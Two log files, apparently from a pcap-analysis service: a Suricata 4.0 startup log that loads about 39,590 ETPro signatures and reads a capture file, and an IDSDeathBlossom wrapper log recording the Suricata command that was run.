23/9/2019 -- 11:16:54 - <Perf> - using shared mpm ctx' for http_client_body
23/9/2019 -- 11:16:54 - <Perf> - using shared mpm ctx' for http_response_line
23/9/2019 -- 11:16:54 - <Perf> - using shared mpm ctx' for http_header
23/9/2019 -- 11:16:54 - <Perf> - using shared mpm ctx' for http_header
23/9/2019 -- 11:16:54 - <Perf> - using shared mpm ctx' for http_header_names
23/9/2019 -- 11:16:54 - <Perf> - using shared mpm ctx' for http_header_names
23/9/2019 -- 11:16:54 - <Perf> - using shared mpm ctx' for http_accept
23/9/2019 -- 11:16:54 - <Perf> - using shared mpm ctx' for http_accept_enc
23/9/2019 -- 11:16:54 - <Perf> - using shared mpm ctx' for http_accept_lang
23/9/2019 -- 11:16:54 - <Perf> - using shared mpm ctx' for http_referer
23/9/2019 -- 11:16:54 - <Perf> - using shared mpm ctx' for http_connection
23/9/2019 -- 11:16:54 - <Perf> - using shared mpm ctx' for http_content_len
23/9/2019 -- 11:16:54 - <Perf> - using shared mpm ctx' for http_content_len
23/9/2019 -- 11:16:54 - <Perf> - using shared mpm ctx' for http_content_type
23/9/2019 -- 11:16:54 - <Perf> - using shared mpm ctx' for http_content_type
23/9/2019 -- 11:16:54 - <Perf> - using shared mpm ctx' for http_protocol
23/9/2019 -- 11:16:54 - <Perf> - using shared mpm ctx' for http_protocol
23/9/2019 -- 11:16:54 - <Perf> - using shared mpm ctx' for http_start
23/9/2019 -- 11:16:54 - <Perf> - using shared mpm ctx' for http_start
23/9/2019 -- 11:16:54 - <Perf> - using shared mpm ctx' for http_raw_header
23/9/2019 -- 11:16:54 - <Perf> - using shared mpm ctx' for http_raw_header
23/9/2019 -- 11:16:54 - <Perf> - using shared mpm ctx' for http_method
23/9/2019 -- 11:16:54 - <Perf> - using shared mpm ctx' for http_cookie
23/9/2019 -- 11:16:54 - <Perf> - using shared mpm ctx' for http_cookie
23/9/2019 -- 11:16:54 - <Perf> - using shared mpm ctx' for http_raw_uri
23/9/2019 -- 11:16:54 - <Perf> - using shared mpm ctx' for http_user_agent
23/9/2019 -- 11:16:54 - <Perf> - using shared mpm ctx' for http_host
23/9/2019 -- 11:16:54 - <Perf> - using shared mpm ctx' for http_raw_host
23/9/2019 -- 11:16:54 - <Perf> - using shared mpm ctx' for http_stat_msg
23/9/2019 -- 11:16:54 - <Perf> - using shared mpm ctx' for http_stat_code
23/9/2019 -- 11:16:54 - <Perf> - using shared mpm ctx' for dns_query
23/9/2019 -- 11:16:54 - <Perf> - using shared mpm ctx' for tls_sni
23/9/2019 -- 11:16:54 - <Perf> - using shared mpm ctx' for tls_cert_issuer
23/9/2019 -- 11:16:54 - <Perf> - using shared mpm ctx' for tls_cert_subject
23/9/2019 -- 11:16:54 - <Perf> - using shared mpm ctx' for tls_cert_serial
23/9/2019 -- 11:16:54 - <Perf> - using shared mpm ctx' for dce_stub_data
23/9/2019 -- 11:16:54 - <Perf> - using shared mpm ctx' for dce_stub_data
23/9/2019 -- 11:16:54 - <Perf> - using shared mpm ctx' for ssh_protocol
23/9/2019 -- 11:16:54 - <Perf> - using shared mpm ctx' for ssh_protocol
23/9/2019 -- 11:16:54 - <Perf> - using shared mpm ctx' for ssh_software
23/9/2019 -- 11:16:54 - <Perf> - using shared mpm ctx' for ssh_software
23/9/2019 -- 11:16:54 - <Perf> - using shared mpm ctx' for file_data
23/9/2019 -- 11:16:54 - <Perf> - using shared mpm ctx' for file_data
23/9/2019 -- 11:16:54 - <Perf> - using shared mpm ctx' for http_request_line
23/9/2019 -- 11:16:54 - <Perf> - using shared mpm ctx' for http_response_line
23/9/2019 -- 11:16:54 - <Info> - 39590 signatures processed. 1175 are IP-only rules, 15422 are inspecting packet payload, 27448 inspect application layer, 0 are decoder event only
23/9/2019 -- 11:16:54 - <Config> - building signature grouping structure, stage 1: preprocessing rules... complete
23/9/2019 -- 11:16:54 - <Perf> - TCP toserver: 41 port groups, 37 unique SGH's, 4 copies
23/9/2019 -- 11:16:54 - <Perf> - TCP toclient: 21 port groups, 20 unique SGH's, 1 copies
23/9/2019 -- 11:16:54 - <Perf> - UDP toserver: 41 port groups, 27 unique SGH's, 14 copies
23/9/2019 -- 11:16:54 - <Perf> - UDP toclient: 21 port groups, 17 unique SGH's, 4 copies
23/9/2019 -- 11:16:54 - <Perf> - OTHER toserver: 254 proto groups, 3 unique SGH's, 251 copies
23/9/2019 -- 11:16:54 - <Perf> - OTHER toclient: 254 proto groups, 0 unique SGH's, 254 copies
23/9/2019 -- 11:17:00 - <Perf> - Unique rule groups: 104
23/9/2019 -- 11:17:00 - <Perf> - Builtin MPM "toserver TCP packet": 35
23/9/2019 -- 11:17:00 - <Perf> - Builtin MPM "toclient TCP packet": 17
23/9/2019 -- 11:17:00 - <Perf> - Builtin MPM "toserver TCP stream": 33
23/9/2019 -- 11:17:00 - <Perf> - Builtin MPM "toclient TCP stream": 19
23/9/2019 -- 11:17:00 - <Perf> - Builtin MPM "toserver UDP packet": 27
23/9/2019 -- 11:17:00 - <Perf> - Builtin MPM "toclient UDP packet": 17
23/9/2019 -- 11:17:00 - <Perf> - Builtin MPM "other IP packet": 3
23/9/2019 -- 11:17:00 - <Perf> - AppLayer MPM "toserver http_uri": 14
23/9/2019 -- 11:17:00 - <Perf> - AppLayer MPM "toserver http_request_line": 1
23/9/2019 -- 11:17:00 - <Perf> - AppLayer MPM "toserver http_client_body": 6
23/9/2019 -- 11:17:00 - <Perf> - AppLayer MPM "toclient http_response_line": 1
23/9/2019 -- 11:17:00 - <Perf> - AppLayer MPM "toserver http_header": 10
23/9/2019 -- 11:17:00 - <Perf> - AppLayer MPM "toclient http_header": 6
23/9/2019 -- 11:17:00 - <Perf> - AppLayer MPM "toserver http_header_names": 2
23/9/2019 -- 11:17:00 - <Perf> - AppLayer MPM "toserver http_accept": 1
23/9/2019 -- 11:17:00 - <Perf> - AppLayer MPM "toserver http_referer": 1
23/9/2019 -- 11:17:00 - <Perf> - AppLayer MPM "toserver http_content_len": 1
23/9/2019 -- 11:17:00 - <Perf> - AppLayer MPM "toserver http_content_type": 1
23/9/2019 -- 11:17:00 - <Perf> - AppLayer MPM "toclient http_content_type": 1
23/9/2019 -- 11:17:00 - <Perf> - AppLayer MPM "toserver http_protocol": 1
23/9/2019 -- 11:17:00 - <Perf> - AppLayer MPM "toserver http_start": 1
23/9/2019 -- 11:17:00 - <Perf> - AppLayer MPM "toserver http_raw_header": 1
23/9/2019 -- 11:17:00 - <Perf> - AppLayer MPM "toclient http_raw_header": 1
23/9/2019 -- 11:17:00 - <Perf> - AppLayer MPM "toserver http_method": 5
23/9/2019 -- 11:17:00 - <Perf> - AppLayer MPM "toserver http_cookie": 1
23/9/2019 -- 11:17:00 - <Perf> - AppLayer MPM "toclient http_cookie": 2
23/9/2019 -- 11:17:00 - <Perf> - AppLayer MPM "toserver http_raw_uri": 1
23/9/2019 -- 11:17:00 - <Perf> - AppLayer MPM "toserver http_user_agent": 6
23/9/2019 -- 11:17:00 - <Perf> - AppLayer MPM "toserver http_host": 2
23/9/2019 -- 11:17:00 - <Perf> - AppLayer MPM "toclient http_stat_code": 2
23/9/2019 -- 11:17:00 - <Perf> - AppLayer MPM "toserver dns_query": 4
23/9/2019 -- 11:17:00 - <Perf> - AppLayer MPM "toserver tls_sni": 2
23/9/2019 -- 11:17:00 - <Perf> - AppLayer MPM "toclient tls_cert_issuer": 2
23/9/2019 -- 11:17:00 - <Perf> - AppLayer MPM "toclient tls_cert_subject": 1
23/9/2019 -- 11:17:00 - <Perf> - AppLayer MPM "toclient tls_cert_serial": 1
23/9/2019 -- 11:17:00 - <Perf> - AppLayer MPM "toserver ssh_protocol": 1
23/9/2019 -- 11:17:00 - <Perf> - AppLayer MPM "toserver file_data": 1
23/9/2019 -- 11:17:00 - <Perf> - AppLayer MPM "toclient file_data": 7
23/9/2019 -- 11:17:02 - <Perf> - Registered 39590 rule profiling counters.
23/9/2019 -- 11:17:02 - <Info> - fast output device (regular) initialized: alert
23/9/2019 -- 11:17:02 - <Info> - eve-log output device (regular) initialized: eve.json
23/9/2019 -- 11:17:02 - <Config> - enabling 'eve-log' module 'alert'
23/9/2019 -- 11:17:02 - <Config> - enabling 'eve-log' module 'http'
23/9/2019 -- 11:17:02 - <Config> - enabling 'eve-log' module 'dns'
23/9/2019 -- 11:17:02 - <Config> - enabling 'eve-log' module 'tls'
23/9/2019 -- 11:17:02 - <Config> - enabling 'eve-log' module 'files'
23/9/2019 -- 11:17:02 - <Config> - enabling 'eve-log' module 'ssh'
23/9/2019 -- 11:17:02 - <Info> - Unified2-alert initialized: filename unified2.alert, limit 32 MB
23/9/2019 -- 11:17:02 - <Info> - stats output device (regular) initialized: stats.log
23/9/2019 -- 11:17:02 - <Config> - AutoFP mode using "Hash" flow load balancer
23/9/2019 -- 11:17:02 - <Info> - reading pcap file /var/pcap/09232019.1116-pcap_6.pcap
23/9/2019 -- 11:17:02 - <Config> - using 1 flow manager threads
23/9/2019 -- 11:17:02 - <Config> 

This file has been truncated.


IDSDeathBlossom.py.log - (1146 bytes) - download
2019-09-23 11:16:39,248 - INFO - __init__ - /opt/IDSDeathBlossom/IDSDeathBlossom.py +38 - DBType: MYSQL
2019-09-23 11:16:40,051 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +247 - Runmode set to run
2019-09-23 11:16:40,052 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +248 - Targets set to suricata-4.0.0-etpro-all
2019-09-23 11:16:40,052 - INFO - run - /opt/IDSDeathBlossom/IDSDeathBlossom.py +320 - looping 1 times in runmode run
2019-09-23 11:16:40,052 - INFO - run - /opt/IDSDeathBlossom/IDSDeathBlossom.py +330 - run with success 0 out of 1
2019-09-23 11:16:40,052 - INFO - execute - /opt/IDSDeathBlossom/IDSDeathBlossom.py +207 - Executing: /opt/suricata400/bin/suricata -c /opt/suricata400/etc/etpro/suricata400-etpro-all.yaml -l /var/www/html/e50b5b64c5f3331deb0fb67bc7c285a556b33745cb75ec8c950e11a498e082d2 -r /var/pcap/09232019.1116-pcap_6.pcap -vvv -k none
2019-09-23 11:17:10,378 - INFO - run_ids - /opt/IDSDeathBlossom/IDSDeathBlossom.py +244 - suricata ran successfully
2019-09-23 11:17:10,379 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +275 - Total time for the idstool 31.1397080421